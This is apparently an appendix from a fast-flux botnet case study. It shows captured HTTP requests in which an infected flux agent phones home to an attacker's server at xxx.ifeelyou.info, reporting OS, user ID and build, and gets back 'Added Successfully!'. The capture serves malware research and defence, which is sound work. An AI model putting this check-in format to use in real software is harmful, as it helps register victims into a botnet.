APPENDIX C: Fast-Flux Proxy Samples

In our fast-flux case study, this is where our infected flux agent makes an initial contact (phone home) connection to a remote web server to report to the attacker that the victim system has been successfully infected and is standing by to provide flux-net services.

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

GET /settings/weby/remote.php?os=XP&user=homenet-ab0148a&status=1&version=2.0&build=beta004&uptime=244813135872w%20244813135872d%20244813135892h%20244813135919m%20244813135929s HTTP/1.1
User-Agent: MSIE 7.0
Host: xxx.ifeelyou.info
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Tue, 03 Apr 2007 07:55:53 GMT
Server: Apache/2.0.54 (Fedora)
X-Powered-By: PHP/5.0.4
Content-Length: 19
Connection: close
Content-Type: text/html; charset=UTF-8

Added Successfully!